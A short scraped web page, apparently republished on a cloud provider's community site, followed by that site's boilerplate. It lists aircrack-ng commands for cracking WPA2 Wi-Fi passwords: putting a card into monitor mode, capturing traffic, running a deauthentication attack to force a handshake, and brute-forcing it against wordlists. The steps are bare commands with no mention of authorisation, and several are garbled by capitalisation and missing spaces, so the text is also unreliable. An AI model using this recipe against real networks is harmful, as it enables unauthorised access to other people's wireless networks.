Airmon-ng password cracking wap2

Source: Internet
Author: User

Ifconfig-A: View All NICs

Ifconfig wlan0 up activating wireless network card

Airmon-ng start wlan0 set wireless Nic Mode

Airodump-ng mon0 view Wireless Network Information

Airodump-ng-W akast-C 6 mon0 packet capture

Aireplay-ng-0 1-A Ap Mac-C client Mac mon0 performs deauth attack to obtain handshake

Aircrack-ng-W password dictionary akast *. Cap start to crack

List of built-in backtrack passwords:/pentest/wireless/aircrack-ng/test/password. lst

Search for the dictionary root @ BT :~ # Find/-name *. lst

Root @ BT :~ # Find/-name *. DIC

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.